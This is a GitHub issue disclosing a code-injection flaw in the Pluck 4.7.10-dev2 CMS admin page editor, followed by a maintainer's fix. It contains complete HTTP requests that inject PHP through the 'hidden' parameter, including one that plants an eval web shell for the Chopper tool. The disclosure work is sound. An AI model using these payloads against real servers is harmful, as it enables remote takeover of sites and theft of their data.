Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page #80

Closed
SecurityCN opened this issue Oct 21, 2019 · 2 comments
Closed

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page #80

SecurityCN opened this issue Oct 21, 2019 · 2 comments
Labels
Password Required for exploit Resolved Security:low

Comments

@SecurityCN
Copy link

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

Vulnerability location:
data\inc\functions.admin.php 531-535 line
2019-10-21-15-39-25

Saves the hidden parameter passed by the POST request to php, but does not escape the special character (') in the value, which can directly close the php syntax remote execution command, such as phpinfo(), eval(), etc.

Demo:
After the installation is successful, go to the management background.Create a new page, enter a title and content Select "Show webpage",submit the request and then grab the request packet to modify the value of the hidden parameter to "no"; phpinfo();'"
2019-10-21-15-29-59

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

2019-10-21-15-22-36

2019-10-21-15-23-39

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa
2019-10-21-15-24-43

Write a sentence Trojan

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Use chopper connection
2019-10-21-15-27-59
BSteelooper pushed a commit that referenced this issue Oct 21, 2019
Fix for issue #80
a4c3759
@BSteelooper
Copy link
Contributor

Could you please test the attached version?

pluck-4.7.10-dev3.tar.gz

@BSteelooper
Copy link
Contributor

Have you retested with the latest dev version?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Password Required for exploit Resolved Security:low
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@BSteelooper @SecurityCN